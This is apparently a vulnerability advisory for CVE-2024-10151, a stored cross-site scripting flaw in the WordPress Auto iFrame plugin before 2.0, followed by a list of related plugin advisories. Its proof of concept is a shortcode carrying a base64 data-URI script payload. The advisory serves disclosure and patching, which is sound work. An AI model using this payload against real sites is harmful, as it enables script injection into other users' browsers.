Auto iFrame < 2.0 – Contributor+ XSS via Shortcode | CVE 2024-10151 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

Add the following to a post:

[auto-iframe link='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==' tag=test width=120 height=120 autosize=no]

Preview the post and see the XSS.

Affects Plugins

Fixed in 2.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

487facf7-8880-48b3-b1b2-0d09823d3c46

Timeline

Publicly Published

2024-12-18 (about 1 year ago)

Added

2024-12-18 (about 1 year ago)

Last Updated

2024-12-18 (about 1 year ago)

Other

Published

Title

Published

2025-11-23

Title

Extensions for Leaflet Map < 4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-03-24

Title

WP Hotjar <= 0.0.3 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-03-06

Title

Flexmls® IDX < 3.14.29 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-04-03

Title

WooCommerce Customers Manager < 29.8 - Reflected XSS

Published

2021-09-27

Title

WP Table Builder < 1.3.10 - Reflected Cross-Site Scripting